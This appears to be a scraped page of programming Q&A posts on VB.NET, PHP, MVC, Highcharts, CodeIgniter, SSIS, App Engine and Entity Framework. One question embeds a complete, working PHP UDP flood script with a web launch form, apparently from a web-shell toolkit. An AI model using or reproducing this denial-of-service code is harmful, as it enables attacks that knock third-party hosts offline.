System.Windows.Forms.DataGridViewCellFormattingEventArgs) Handles DGVMain.CellFormatting Dim DGVMain As DataGridView = CType(sender, DataGridView) e.Value = EvaluateValue(DGVMain.Rows(e.RowIndex).DataBoundItem, DGVMain.Columns(e.ColumnIndex).DataPropertyName) End Sub Private Function EvaluateValue(ByRef myObj As Object, ByRef myProp As String) As String Dim Ret As String = "" Dim Props As System.Reflection.PropertyInfo() Dim PropA As System.Reflection.PropertyInfo Dim ObjA As Object If myProp.Contains(".") Then myProp = myProp.Substring(0, myProp.IndexOf(".")) Props = myObj.GetType().GetProperties() For Each PropA In Props ObjA = PropA.GetValue(myObj, New Object() {}) If ObjA.GetType().Name = myProp Then Ret = EvaluateValue(ObjA, myProp.Substring(myProp.IndexOf(".") + 1)) Exit For End If Next Else PropA = myObj.GetType().GetProperty(myProp) Ret = PropA.GetValue(myObj, New Object() {}).ToString() End If Return Ret End Function
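
    One way to finish the CellFormatting approach is to resolve the DataPropertyName as a dotted property path instead of matching on type names, which also removes the case-sensitivity problem. A hedged VB sketch (names follow the question; the third column would then use DataPropertyName = "mycategory.name"):

        Private Function ResolvePropertyPath(ByVal obj As Object, ByVal propertyPath As String) As String
            Dim current As Object = obj
            Dim flags As System.Reflection.BindingFlags = System.Reflection.BindingFlags.Public Or System.Reflection.BindingFlags.Instance Or System.Reflection.BindingFlags.IgnoreCase
            For Each part As String In propertyPath.Split("."c)
                If current Is Nothing Then Return String.Empty
                ' Look the segment up by property name, ignoring case.
                Dim prop As System.Reflection.PropertyInfo = current.GetType().GetProperty(part, flags)
                If prop Is Nothing Then Return String.Empty
                current = prop.GetValue(current, Nothing)
            Next
            Return If(current Is Nothing, String.Empty, current.ToString())
        End Function

        ' In the CellFormatting handler:
        ' e.Value = ResolvePropertyPath(DGVMain.Rows(e.RowIndex).DataBoundItem, DGVMain.Columns(e.ColumnIndex).DataPropertyName)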

    Read the article

  • Do sockets opened with fsockopen stay open after you leave the page via your browser?

    - by Rob
    if(isset($_GET['host'])&&is_numeric($_GET['time'])){ $pakits = 0; ignore_user_abort(TRUE); set_time_limit(0); $exec_time = $_GET['time']; $time = time(); //print "Started: ".time('h:i:s')."<br>"; $max_time = $time+$exec_time; $host = $_GET['host']; for($i=0;$i<65000;$i++){ $out .= 'X'; } while(1){ $pakits++; if(time() > $max_time){ break; } $rand = rand(1,65000); $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "<br><b>UDP Flood</b><br>Completed with $pakits (" . round(($pakits*65)/1024, 2) . " MB) packets averaging ". round($pakits/$exec_time, 2) . " packets per second \n"; echo '<br><br> <form action="'.$surl.'" method=GET> <input type="hidden" name="act" value="phptools"> Host: <input type=text name=host value=localhost> Length (seconds): <input type=text name=time value=9999> <input type=submit value=Go></form>'; }else{ echo '<br><b>UDP Flood</b><br> <form action=? method=GET> <input type="hidden" name="act" value="phptools"> Host: <br><input type=text name=host value=localhost><br> Length (seconds): <br><input type=text name=time value=9999><br> <br> <input type=submit value=Go></form>'; } I've been looking around and asking my friends for awhile now, if I use this script to tell the server to open the sockets using fsockopen, if I leave the webpage will the sockets remain open until the duration is completed?

    Read the article

  • Consolidating coding styles: Funcs, private method, single method classes

    - by jdoig
    Hi all, We currently have 3 devs with, some, conflicting styles and I'm looking for a way to bring peace to the kingdom... The Coders: Foo 1: Likes to use Func's & Action's inside public methods. He uses actions to alias off lengthy method calls and Func's to perform simple tasks that can be expressed in 1 or 2 lines and will be used frequently through out the code Pros: The main body of his code is succinct and very readable, often with only one or 2 public methods per class and rarely any private methods. Cons: The start of methods contain blocks of lambda rich code that other developers don't enjoy reading; and, on occasion, can contain higher order functions that other dev's REALLY don't like reading. Foo 2: Likes to create a private method for (almost) everything the public method will have to do . Pros: Public methods remain small and readable (to all developers). Cons: Private methods are numerous. With private methods that call into other private methods, that call into... etc, etc. Making code hard to navigate. Foo 3: Likes to create a public class with a, single, public method for every, non-trivial, task that needs performing, then dependency inject them into other objects. Pros: Easily testable, easy to understand (one object, one responsibility). Cons: project gets littered by classes, opening multiple class files to understand what code does makes navigation awkward. It would be great to take the best of all these techniques... Foo-1 Has really nice, readable (almost dsl-like) code... for the most part, except for all the Action and Func lambda shenanigans bulked together at the start of a method. Foo-3 Has highly testable and extensible code that just feels a bit "belt-&-braces" for some solutions and has some code-navigation niggles (constantly hitting F12 in VS and opening 5 other .cs files to find out what a single method does). And Foo-2... Well I'm not sure I like anything about the one-huge .cs file with 2 public methods and 12 private ones, except for the fact it's easier for juniors to dig into. I admit I grossly over-simplified the explanations of those coding styles; but if any one knows of any patterns, practices or diplomatic-manoeuvres that can help unite our three developers (without just telling any of them to just "stop it!") that would be great. From a feasibility standpoint : Foo-1's style meets with the most resistance due to some developers finding lambda and/or Func's hard to read. Foo-2's style meets with a less resistance as it's just so easy to fall into. Foo-3's style requires the most forward thinking and is difficult to enforce when time is short. Any ideas on some coding styles or conventions that can make this work?

    Read the article

  • XML DOM node children

    - by matt
    Need some help I've got lots of code and i want to make it shorter i know there's a way but I can't remember it this is code example: <?xml version="1.0" encoding="ISO-8859-1"?> <bookstore> <book category="cooking"> <title lang="en">Everyday Italian</title> <author>Giada De Laurentiis</author> <year>2005</year> <price>30.00</price> </book> <book category="children"> <title lang="en">Harry Potter</title> <author>J K. Rowling</author> <year>2005</year> <price>29.99</price> </book> <book category="web"> <title lang="en">XQuery Kick Start</title> <author>James McGovern</author> <author>Per Bothner</author> <author>Kurt Cagle</author> <author>James Linn</author> <author>Vaidyanathan Nagarajan</author> <year>2003</year> <price>49.99</price> </book> <book category="web" cover="paperback"> <title lang="en">Learning XML</title> <author>Erik T. Ray</author> <year>2003</year> <price>39.95</price> </book> </bookstore As you can see the different nodes, children now is there a way to make this code smaller so I don't have to keep writing the nodes and children

    Read the article

  • How do I integrate a new MVC C# Project with an existing Web Forms VB.NET Web Application Project?

    - by Jordan Rieger
    We have a corporate website with a large amount of dynamic business application pages (e.g. Shopping Cart, Helpdesk, Product/Service management, Reporting, etc.) The site was built as an ASP.Net Web Application Project (WAP). Our systems have evolved over the years to use .NET 4.5 and various custom business logic DLLs (written in a mix of C# and VB.NET). However, the site itself is still using VB.NET Web Forms. We now have done a few side projects in MVC 4 using Razor/C#, and we want to use this framework for new pages on the main corporate site going forward. What would be the easiest way to achieve this? I found this nice list of steps to integrate MVC 4 into an existing Web Forms app. The problem is that because our existing app is a VB.NET WAP, it compiles into a single DLL, and .NET allows only one language per DLL. The site is way too big for us to contemplate converting it to C# all at once (yes, I've looked at the conversion tools, and they're good, but even 99% accuracy would leave us a huge amount of cleanup work.) I thought about converting the existing WAP into a Web Site Project (WSP) which does allow mixing languages and then following the steps above, but after a few pages of Google results, I couldn't find any steps for converting a WAP to WSP. (Plenty of sites offer the reverse steps: converting a WSP to a WAP.) Another idea I had was to create a completely separate MVC project, and then somehow squish them together into the same folder structure, where they would share the bin folder but compile to separate DLL's. I have no idea if this is possible, because certain files would collide (e.g. Global.asax, web.config, etc.) Finally, I can imagine a compromise solution where we keep all the MVC stuff in its own separate application under a subfolder of the main solution. We already use our own custom session state solution, so it wouldn't be difficult to pass data between the old site to the new pages. Which of the ideas above do you think makes the most sense for us? Is there another solution that I'm missing?

    Read the article

  • How To Create A Download Quota.

    - by snikolov
    I need to create an handy file down loader which will count the amount of bytes downloaded and stop when it has exceed a preset limit. i need to mirror some files but i only have 7 gb per moth of bandwidth and i dont want to exceed the limit. Example limits can be in bytes or number of files, each user has their own limit, as well as a limit for Download Quota itself. So if you set a limit of 2 gigabytes for Download Quota, downloads stop at 2 gigabytes, even if you have 3 users with a limit of 1 gigabyte each. if ($range) { //pass client Range header to rapidshare // _insert($range); $cookie .= "\r\nRange: $range"; $multipart = true; header("X-UR-RANGE-Range: $range"); } //octet-stream + attachment => client always stores file header('Content-type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $fn . '"'); //always included so clients know this script supports resuming header("Accept-Ranges: bytes"); //awful hack to pass rapidshare the premium cookie $user_agent = ini_get("user_agent"); ini_set("user_agent", $user_agent . "\r\nCookie: enc=$cookie"); $httphandle = fopen($url, "r"); $headers = stream_get_meta_data($httphandle); //let's check the return header of rapidshare for range / length indicators //we'll just pass these to the client foreach ($headers["wrapper_data"] as $header) { $header = trim($header); if (substr(strtolower($header), 0, strlen("content-range")) == "content-range") { // _insert($range); header($header); header("X-RS-RANGE-" . $header); $multipart = true; //content-range indicates partial download } elseif (substr(strtolower($header), 0, strlen("Content-Length")) == "content-length") { // _insert($range); header($header); header("X-RS-CL-" . $header); } } //now show the client he has a partial download if ($multipart) header('HTTP/1.1 206 Partial Content'); flush(); $download_rate = 100; while (!feof($httphandle)) { // send the current file part to the browser $var_stat = fread($httphandle, round($download_rate * 1024)); $var12 = strlen($var_stat); ////////////////////////////////// echo $var_stat; ///////////////////////////////// // flush the content to the browser flush(); // sleep one second sleep(1); }
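
    What the posted loop is missing is a persisted per-user counter and a check against the limit before sending each chunk. A hedged PHP sketch; the flat-file counter, $user_id and the 2 GB limit are illustrative, and a database row per user works the same way.

        // Load how much this user has already downloaded this period.
        $quota_limit  = 2 * 1024 * 1024 * 1024;                 // e.g. 2 GB per user
        $counter_file = '/var/data/quota_' . $user_id . '.txt'; // or a DB row keyed by user
        $used = file_exists($counter_file) ? (float) file_get_contents($counter_file) : 0;

        while (!feof($httphandle)) {
            if ($used >= $quota_limit) {
                break;                                          // quota exhausted: stop the transfer
            }
            $chunk = fread($httphandle, round($download_rate * 1024));
            $used += strlen($chunk);
            file_put_contents($counter_file, $used);            // persist after every chunk
            echo $chunk;
            flush();
            sleep(1);
        }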

    Read the article

  • How to troubleshoot a Highcharts script that's not rendering data when date is added and hanging the JS engine with large datasets?

    - by ylluminate
    I have a Highchart JS graph that I'm building in Rails (although I don't think Ruby has real bearing on this problem unless it's the Date output format) to which I'm adding the timestamp of each datapoint. Presently the array of floats is rendering fine without timestamps, however when I add the timestamp to the series it fails to rend. What's worse is that when the series has hundreds of entries all sorts of problems arise, not the least of which is the browser entirely hanging and requiring a force quit / kill. I'm using the following to build the array of arrays data series: series1 = readings.map{|row| [(row.date.to_i * 1000), (row.data1.to_f if BigDecimal(row.data1) != BigDecimal("-1000.0"))] } This yields a result like this: series: [{"name":"Data 1","data":[[1326262980000,1.79e-09],[1326262920000,1.29e-09],[1326262860000,1.22e-09],[1326262800000,1.42e-09],[1326262740000,1.29e-09],[1326262680000,1.34e-09],[1326262620000,1.31e-09],[1326262560000,1.51e-09],[1326262500000,1.24e-09],[1326262440000,1.7e-09],[1326262380000,1.24e-09],[1326262320000,1.29e-09],[1326262260000,1.53e-09],[1326262200000,1.23e-09],[1326262140000,1.21e-09]],"color":"blue"}] Yet nothing appears on the graph as noted. Notwithstanding, when I compare the data series in one of their very similar examples here: http://www.highcharts.com/demo/spline-irregular-time It appears that really the data series are formatted identically (except in mine I use the timestamp vs date method). This leads me to think I've got a problem with the timestamp output, but I'm just not able to figure out where / how as I'm converting the date output to an integer multipled by 1000 to convert it to milliseconds as per explained in a similar Railscasts tutorial. I would very much appreciate it if someone could point me in the right direction here as to what I may be doing wrong. What could cause no data to appear on the graph in smaller sized sets (<100 points) and when into the hundreds causes an apparent hang in the javascript engine in this case? Perhaps ultimately the key lies here as this is the entire js that's being generated and not rendering: jQuery(function() { // 1. Define JSON options var options = { chart: {"defaultSeriesType":"spline","renderTo":"chart_name"}, title: {"text":"Title"}, legend: {"layout":"vertical","style":{}}, xAxis: {"title":{"text":"UTC Time"},"type":"datetime"}, yAxis: [{"title":{"text":"Left Title","margin":10}},{"title":{"text":"Right Groups Title"},"opposite":true}], tooltip: {"enabled":true}, credits: {"enabled":false}, plotOptions: {"areaspline":{}}, series: [{"name":"Data 1","data":[[1326262980000,1.79e-08],[1326262920000,1.69e-08],[1326262860000,1.62e-08],[1326262800000,1.42e-08],[1326262740000,1.29e-08],[1326262680000,1.34e-08],[1326262620000,1.31e-08],[1326262560000,1.51e-08],[1326262500000,1.64e-08],[1326262440000,1.7e-08],[1326262380000,1.64e-08],[1326262320000,1.69e-08],[1326262260000,1.53e-08],[1326262200000,1.23e-08],[1326262140000,1.21e-08]],"color":"blue"},{"name":"Data 2","data":[[1326262980000,9.79e-09],[1326262920000,9.78e-09],[1326262860000,9.8e-09],[1326262800000,9.82e-09],[1326262740000,9.88e-09],[1326262680000,9.89e-09],[1326262620000,1.3e-06],[1326262560000,1.32e-06],[1326262500000,1.33e-06],[1326262440000,1.33e-06],[1326262380000,1.34e-06],[1326262320000,1.33e-06],[1326262260000,1.32e-06],[1326262200000,1.32e-06],[1326262140000,1.32e-06]],"color":"red"}], subtitle: {} }; // 2. Add callbacks (non-JSON compliant) // 3. Build the chart var chart = new Highcharts.StockChart(options); });
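
    One thing worth checking first: the points in the sample series are in descending time order (newest first), and Highcharts expects each series sorted by ascending x on a datetime axis; unsorted data is a classic cause of both an empty plot and very slow processing on larger sets. A hedged sketch of sorting on the client before the chart is built (the same sort can be done on the Rails side before the options are serialized):

        // Ensure every series is in ascending-time order before handing it to Highcharts.
        jQuery.each(options.series, function (i, s) {
            s.data.sort(function (a, b) { return a[0] - b[0]; });
        });

        var chart = new Highcharts.StockChart(options);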

    Read the article

  • CI pagination, POST problem

    - by Gwood
    Okay, I am pretty new to CI and I am stuck on pagination. I am paginating a record set that is the result of a query, and everything seems to work, but there is some problem, probably with the links. I display 10 results per page. If the results are fewer than 10 it is fine, and if I pull up all the records in the table it also works fine. But when the result is more than 10 rows, the first 10 are displayed correctly, and when I click the pagination link to get to the next page, that page displays the rest of the results from the query as well as other records in the table. I am confused. Any help? Here is the model code I am using:

        function getTeesLike($field, $param) {
            $this->db->like($field, $param);
            $this->db->limit(10, $this->uri->segment(3));
            $query = $this->db->get('shirt');
            if ($query->num_rows() > 0) {
                return $query->result_array();
            }
        }

        function getNumTeesfromQ($field, $param) {
            $this->db->like($field, $param);
            $query = $this->db->get('shirt');
            return $query->num_rows();
        }

    And here is the controller code:

        $KW = $this->input->post('searchstr');
        $this->load->library('pagination');
        $config['base_url'] = 'http://localhost/cit/index.php/tees/show/';
        $config['total_rows'] = $this->T->getNumTeesfromQ('Title', $KW);
        $config['per_page'] = '10';
        $this->pagination->initialize($config);
        $data['tees'] = $this->T->getTeesLike('Title', $KW);
        $data['title'] = 'Displaying Tees data';
        $data['header'] = 'Tees List';
        $data['links'] = $this->pagination->create_links();
        $this->load->view('tee_res', $data);
        // What am I doing wrong here? Please help ...

    I guess the problem is with $KW = $this->input->post('searchstr'), because if I hard-code a value for $KW it works fine. Maybe I should use POST differently, but how do I pass the value from the form without POSTing it? It's CI, so not GET ...
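
    The usual cause here is that the POSTed search term only exists on the first request; the pagination links issue plain GETs, so $this->input->post('searchstr') comes back empty on page 2 and the model's like() no longer filters. A hedged sketch of carrying the keyword across pages with CodeIgniter's session library (assumed to be loaded or autoloaded):

        $KW = $this->input->post('searchstr');
        if ($KW !== false && $KW !== '') {
            $this->session->set_userdata('searchstr', $KW);   // new search: remember the term
        } else {
            $KW = $this->session->userdata('searchstr');      // pagination click: reuse the last term
        }

        $this->load->library('pagination');
        $config['base_url']   = 'http://localhost/cit/index.php/tees/show/';
        $config['total_rows'] = $this->T->getNumTeesfromQ('Title', $KW);
        $config['per_page']   = '10';
        $this->pagination->initialize($config);
        $data['tees'] = $this->T->getTeesLike('Title', $KW);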

    Read the article

  • Transforming binary data using SSIS and SQL Server 2008

    - by Rick
    Hello All - I have a task to import/transform and extract zipped binary files that contain both text data as well as embeded binary data. Within the data is data that is relational in nature and needs to be processed into a defined database structure. Currently I have a C# single threaded app that essentially grabs all the files from the directory (currently there is 13K files of varying sizes) and extracts the data on a single thread line by line inserts to the database. As you could imagine this is a very slow process and unacceptable. There are several different parsing routines used depending on the header record in the file. There are potentially upto a million rows per file when all the data is extracted to the row level of detail. Follow on task is to parse those rows into their appropriate tables based on is content. i.e. the textual content has to be parsed further into "buckets" of like data in the database. That about sums up the big picture. Now for the problem task list. How do i iterate through a packet of data using SSIS? In the app the file is decompressed and then is parsed using streams data type and byte arrays and is routed to the required parsing routine based on the header data of each packet. There is bit swapping involved as well. Should i wrap up the app code into a script task(s) and let it do the custom processing? The data is seperated by year and the sql server tables is partitioned by year as well. I need to be able to "catch" bad file data as well and process by hand most likely. Should i simply load the zipped file to sql as a blob and parse the file with T-SQL? Would that be multi threaded if done that way? Not sure how to do the parsing in tsql that is involved here. Which do you think would be faster? Potentially the data that is currently processed via files could come to us via a socket. Can SSIS collect that data in real time? How would i go about setting that up? Processing these new files from the directorys will become a daily task. I can manage the data once i get it to sql server. Getting it there in a timely fashion seems to be the long pole in the tent for me. I would appreciate any comments or suggestions from the group. Rick

    Read the article

  • Optimizing tasks to reduce CPU in a trading application

    - by Joel
    Hello, I have designed a trading application that handles customers stocks investment portfolio. I am using two datastore kinds: Stocks - Contains unique stock name and its daily percent change. UserTransactions - Contains information regarding a specific purchase of a stock made by a user : the value of the purchase along with a reference to Stock for the current purchase. db.Model python modules: class Stocks (db.Model): stockname = db.StringProperty(multiline=True) dailyPercentChange=db.FloatProperty(default=1.0) class UserTransactions (db.Model): buyer = db.UserProperty() value=db.FloatProperty() stockref = db.ReferenceProperty(Stocks) Once an hour I need to update the database: update the daily percent change in Stocks and then update the value of all entities in UserTransactions that refer to that stock. The following python module iterates over all the stocks, update the dailyPercentChange property, and invoke a task to go over all UserTransactions entities which refer to the stock and update their value: Stocks.py # Iterate over all stocks in datastore for stock in Stocks.all(): # update daily percent change in datastore db.run_in_transaction(updateStockTxn, stock.key()) # create a task to update all user transactions entities referring to this stock taskqueue.add(url='/task', params={'stock_key': str(stock.key(), 'value' : self.request.get ('some_val_for_stock') }) def updateStockTxn(stock_key): #fetch the stock again - necessary to avoid concurrency updates stock = db.get(stock_key) stock.dailyPercentChange= data.get('some_val_for_stock') # I get this value from outside ... some more calculations here ... stock.put() Task.py (/task) # Amount of transaction per task amountPerCall=10 stock=db.get(self.request.get("stock_key")) # Get all user transactions which point to current stock user_transaction_query=stock.usertransactions_set cursor=self.request.get("cursor") if cursor: user_transaction_query.with_cursor(cursor) # Spawn another task if more than 10 transactions are in datastore transactions = user_transaction_query.fetch(amountPerCall) if len(transactions)==amountPerCall: taskqueue.add(url='/task', params={'stock_key': str(stock.key(), 'value' : self.request.get ('some_val_for_stock'), 'cursor': user_transaction_query.cursor() }) # Iterate over all transaction pointing to stock and update their value for transaction in transactions: db.run_in_transaction(updateUserTransactionTxn, transaction.key()) def updateUserTransactionTxn(transaction_key): #fetch the transaction again - necessary to avoid concurrency updates transaction = db.get(transaction_key) transaction.value= transaction.value* self.request.get ('some_val_for_stock') db.put(transaction) The problem: Currently the system works great, but the problem is that it is not scaling well… I have around 100 Stocks with 300 User Transactions, and I run the update every hour. In the dashboard, I see that the task.py takes around 65% of the CPU (Stock.py takes around 20%-30%) and I am using almost all of the 6.5 free CPU hours given to me by app engine. I have no problem to enable billing and pay for additional CPU, but the problem is the scaling of the system… Using 6.5 CPU hours for 100 stocks is very poor. I was wondering, given the requirements of the system as mentioned above, if there is a better and more efficient implementation (or just a small change that can help with the current implemntation) than the one presented here. Thanks!! Joel
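
    Most of the task's CPU time is going into one datastore transaction per UserTransactions entity. Since a single redundant node does all the writing, a hedged alternative (sketched below in Python) is to update the fetched batch in memory and write it back with one batched db.put(), trading the per-entity transactional retry for roughly one write round trip per ten entities. The 'value' parameter name follows the code above.

        factor = float(self.request.get('value'))     # multiplier passed along by Stocks.py

        transactions = user_transaction_query.fetch(amountPerCall)
        for transaction in transactions:
            transaction.value *= factor

        db.put(transactions)                          # one batched write instead of ten transactions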

    Read the article

  • Entity Framework looking for wrong column

    - by m.edmondson
    I'm brand new to the Entity Framework and trying to learn all it can offer. I'm currently working my way through the MVC Music Store tutorial which includes the following code: public ActionResult Browse(string genre) { // Retrieve Genre and its Associated Albums from database var genreModel = storeDB.Genres.Include("Albums") .Single(g => g.Name == genre); return View(genreModel); } as I'm working in VB I converted it like so: Function Browse(ByVal genre As String) As ActionResult 'Retrieve Genre and its Associated Albums from database Dim genreModel = storeDB.Genres.Include("Albums"). _ Single(Function(g) g.Name = genre) Return(View(genreModel)) End Function The problem is I'm getting the following exception: Invalid column name 'GenreGenreId'. Which I know is true, but I can't for the life of my work out where it's getting 'GenreGenreId' from. Probably a basic question but I'll appreciate any help in the right direction. As per requested here is the source for my classes: Album.vb Public Class Album Private _title As String Private _genre As Genre Private _AlbumId As Int32 Private _GenreId As Int32 Private _ArtistId As Int32 Private _Price As Decimal Private _AlbumArtUrl As String Public Property Title As String Get Return _title End Get Set(ByVal value As String) _title = value End Set End Property Public Property AlbumId As Int16 Get Return _AlbumId End Get Set(ByVal value As Int16) _AlbumId = value End Set End Property Public Property GenreId As Int16 Get Return _GenreId End Get Set(ByVal value As Int16) _GenreId = value End Set End Property Public Property ArtistId As Int16 Get Return _ArtistId End Get Set(ByVal value As Int16) _ArtistId = value End Set End Property Public Property AlbumArtUrl As String Get Return _AlbumArtUrl End Get Set(ByVal value As String) _AlbumArtUrl = value End Set End Property Public Property Price As Decimal Get Return _Price End Get Set(ByVal value As Decimal) _Price = value End Set End Property Public Property Genre As Genre Get Return _genre End Get Set(ByVal value As Genre) _genre = value End Set End Property End Class Genre.vb Public Class Genre Dim _genreId As Int32 Dim _Name As String Dim _Description As String Dim _Albums As List(Of Album) Public Property GenreId As Int32 Get Return _genreId End Get Set(ByVal value As Int32) _genreId = value End Set End Property Public Property Name As String Get Return _Name End Get Set(ByVal value As String) _Name = value End Set End Property Public Property Description As String Get Return _Description End Get Set(ByVal value As String) _Description = value End Set End Property Public Property Albums As List(Of Album) Get Return _Albums End Get Set(ByVal value As List(Of Album)) _Albums = value End Set End Property End Class MusicStoreEntities.vb Imports System.Data.Entity Namespace MvcApplication1 Public Class MusicStoreEntities Inherits DbContext Public Property Albums As DbSet(Of Album) Public Property Genres As DbSet(Of Genre) End Class End Namespace
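
    The GenreGenreId column is what Code First synthesizes when it cannot match the Genre navigation property to an existing foreign-key property; here the likely blocker is that Album.GenreId is declared as Int16 while Genre.GenreId is Int32, so the convention does not line them up. A hedged sketch of fixing the type and mapping the relationship explicitly (EF 4.1 fluent API assumed):

        Imports System.Data.Entity

        Public Class MusicStoreEntities
            Inherits DbContext

            Public Property Albums As DbSet(Of Album)
            Public Property Genres As DbSet(Of Genre)

            Protected Overrides Sub OnModelCreating(ByVal modelBuilder As DbModelBuilder)
                ' Assumes Album.GenreId has been changed to Int32 to match Genre.GenreId.
                modelBuilder.Entity(Of Album)() _
                    .HasRequired(Function(a) a.Genre) _
                    .WithMany(Function(g) g.Albums) _
                    .HasForeignKey(Function(a) a.GenreId)
            End Sub
        End Class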

    Read the article

  • Classes to Entities; Like-class inheritance problems

    - by Stacey
    Beyond work, some friends and I are trying to build a game of sorts; The way we structure some of it works pretty well for a normal object oriented approach, but as most developers will attest this does not always translate itself well into a database persistent approach. This is not the absolute layout of what we have, it is just a sample model given for sake of representation. The whole project is being done in C# 4.0, and we have every intention of using Entity Framework 4.0 (unless Fluent nHibernate can really offer us something we outright cannot do in EF). One of the problems we keep running across is inheriting things in database models. Using the Entity Framework designer, I can draw the same code I have below; but I'm sure it is pretty obvious that it doesn't work like it is expected to. To clarify a little bit; 'Items' have bonuses, which can be of anything. Therefore, every part of the game must derive from something similar so that no matter what is 'changed' it is all at a basic enough level to be hooked into. Sounds fairly simple and straightforward, right? So then, we inherit everything that pertains to the game from 'Unit'. Weights, Measures, Random (think like dice, maybe?), and there will be other such entities. Some of them are similar, but in code they will each react differently. We're having a really big problem with abstracting this kind of thing into a database model. Without 'Enum' support, it is proving difficult to translate into multiple tables that still share a common listing. One solution we've depicted is to use a 'key ring' type approach, where everything that attaches to a character is stored on a 'Ring' with a 'Key', where each Key has a Value that represents a type. This works functionally but we've discovered it becomes very sluggish and performs poorly. We also dislike this approach because it begins to feel as if everything is 'dumped' into one class; which makes management and logical structure difficult to adhere to. I was hoping someone else might have some ideas on what I could do with this problem. It's really driving me up the wall; To summarize; the goal is to build a type (Unit) that can be used as a base type (Table per Type) for generic reference across a relatively global scope, without having to dump everything into a single collection. I can use an Interface to determine actual behavior so that isn't too big of an issue. This is 'roughly' the same idea expressed in the Entity Framework.

    Read the article
